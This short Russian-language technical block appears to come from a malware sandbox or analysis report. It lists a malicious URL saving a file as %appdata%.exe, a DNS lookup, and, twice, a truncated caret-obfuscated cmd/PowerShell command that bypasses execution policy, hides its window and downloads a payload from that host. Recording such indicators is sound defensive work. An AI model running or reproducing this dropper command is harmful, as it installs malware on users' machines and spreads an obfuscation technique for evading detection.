Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POW^eR^sH^eLl.e^XE -exe^CUTIon^p^olicy BYpa^s^s -N^OPR^oFile -^WIn^d^Ow^stYL^e h^ID^Den ^(^N^EW^-^oBJEct s^Ys^T^e^m^.^neT.W^eB^Clien^t).dOwnLO^A^Df^i^l^E^('http://www.zoerpo...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "POW^eR^sH^eLl.e^XE -exe^CUTIon^p^olicy BYpa^s^s -N^OPR^oFile -^WIn^d^Ow^stYL^e h^ID^Den ^(^N^EW^-^oBJEct s^Ys^T^e^m^.^neT.W^eB^Clien^t).dOwnLO^A^Df^i^l^E^('http://www.zoerpo...' (со скрытым окном)